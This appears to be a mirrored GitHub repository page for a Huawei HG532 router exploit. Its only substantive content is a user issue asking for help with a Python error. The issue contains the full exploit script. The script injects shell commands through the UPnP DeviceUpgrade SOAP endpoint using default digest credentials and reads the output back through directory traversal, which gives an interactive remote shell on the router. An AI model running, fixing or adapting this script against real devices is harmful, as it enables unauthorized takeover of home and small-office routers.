Coder Social home page Coder Social logo

huawei_router_hg532's Introduction

I'm reb311ion.

  • ๐Ÿ”ญ Iโ€™m currently working as a cybersecurity R&D Engineer.
  • ๐ŸŒฑ Main interests are Reverse Engineering and Malware Analysis
  • ๐Ÿ“ซ How to reach me: e-mail twitter keybase
  • ๐Ÿ’ฌ Favorite quote: Sucess is the best revenge.

huawei_router_hg532's People

Stargazers

avatar avatar avatar

Watchers

avatar

Forkers

aym3n66

huawei_router_hg532's Issues

TypeError: a bytes-like object is required, not 'str'

Hi can you help me fix this Error

Traceback (most recent call last):
File "exploit.py", line 44, in
main()
File "exploit.py", line 41, in main
pwd = exploit(targetip,pwd_path).strip("\n")
TypeError: a bytes-like object is required, not 'str'

`import logging,requests,os,sys
import urllib.request
from requests.auth import HTTPDigestAuth
DEFAULT_HEADERS = {"User-Agent": "Mozilla", }
DEFAULT_TIMEOUT = 5
def fetch_url(url):
global DEFAULT_HEADERS, DEFAULT_TIMEOUT
request = urllib.request.Request(url, headers=DEFAULT_HEADERS)
data = urllib.request.urlopen(request, timeout=DEFAULT_TIMEOUT).read()
return data
def exploit(ip, path):
url = "http://%s:37215/icon/../../../%s" % (ip, path)
data = fetch_url(url)
return data

def main():
pwd = "/"
cmd_path = "/tmp/ccmd"
pwd_path = "/tmp/cpwd"
while True:
targetip = sys.argv[1]
cmd_ = input("[{}]$ ".format(pwd))
cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)
rm = "\n <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">\n $(" + cmd + ")\n$(echo HUAWEIUPNP)\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"
requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
assert cmd_path.startswith("/"), "An absolute path is required"
data = exploit(targetip, cmd_path)
open(cmd_path,"wb").write(data)
if "cd" in cmd_:
pass
elif "clear" in cmd_:
os.system("clear")
elif "cat" in cmd_:
os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))
else:
if "|" in cmd_:
os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))
else:
os.system("cat {}".format(cmd_path))
pwd = exploit(targetip,pwd_path).strip("\n")

if name == "main":
main()`

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.